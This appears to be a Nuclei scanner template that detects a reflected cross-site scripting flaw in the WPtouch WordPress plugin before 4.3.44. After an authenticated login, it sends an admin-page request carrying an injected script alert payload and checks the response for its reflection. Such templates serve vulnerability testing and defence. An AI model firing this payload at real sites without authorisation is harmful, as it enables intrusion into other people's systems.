id: wptouch-xss

info:
  name: WPtouch < 4.3.44 - Cross Site Scripting
  author: akincibor
  severity: medium
  description: |
    The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4
    - https://wordpress.org/plugins/wptouch/advanced/
  tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - 'WPtouchCustom'
          - 'WPtouchAjax'
          - 'toplevel_page_wptouch-admin'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
